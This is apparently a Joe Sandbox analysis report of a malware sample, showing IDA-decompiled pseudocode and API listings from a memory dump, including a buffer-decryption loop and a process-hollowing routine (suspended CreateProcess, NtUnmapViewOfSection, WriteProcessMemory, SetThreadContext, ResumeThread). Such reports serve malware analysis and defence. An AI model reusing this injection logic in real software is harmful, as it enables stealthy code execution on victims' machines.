    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}





    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}













    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}














    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}














    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}









    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}




    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}












    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}












    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}







    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
